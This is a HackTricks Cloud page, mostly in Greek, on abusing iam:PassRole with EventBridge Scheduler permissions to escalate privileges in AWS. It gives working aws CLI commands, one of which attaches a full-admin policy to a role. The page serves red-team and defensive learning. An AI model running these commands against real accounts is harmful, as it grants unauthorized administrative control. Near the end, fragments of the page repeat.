AWS - EventBridge Scheduler Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EventBridge Scheduler

Περισσότερες πληροφορίες για το EventBridge Scheduler στο:

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

Ένας επιτιθέμενος με αυτές τις άδειες θα μπορεί να δημιουργήσει|ενημερώσει ένα πρόγραμμα και να καταχραστεί τις άδειες του ρόλου του προγράμματος που είναι συνημμένος σε αυτό για να εκτελέσει οποιαδήποτε ενέργεια.

Για παράδειγμα, θα μπορούσαν να ρυθμίσουν το πρόγραμμα να καλέσει μια συνάρτηση Lambda η οποία είναι μια προτυπωμένη ενέργεια:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Εκτός από τις προτυπωμένες ενέργειες υπηρεσιών, μπορείτε να χρησιμοποιήσετε universal targets στο EventBridge Scheduler για να καλέσετε μια ευρεία γκάμα API λειτουργιών για πολλές υπηρεσίες AWS. Οι universal targets προσφέρουν ευελιξία για να καλέσετε σχεδόν οποιοδήποτε API. Ένα παράδειγμα μπορεί να είναι η χρήση universal targets προσθέτοντας "AdminAccessPolicy", χρησιμοποιώντας έναν ρόλο που έχει πολιτική "putRolePolicy":

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Αναφορές

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - EMR Privesc NextAWS - Gamelift

Last updated 13 days ago

EventBridge Scheduler

Περισσότερες πληροφορίες για το EventBridge Scheduler στο:

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Αναφορές

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Αναφορές

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)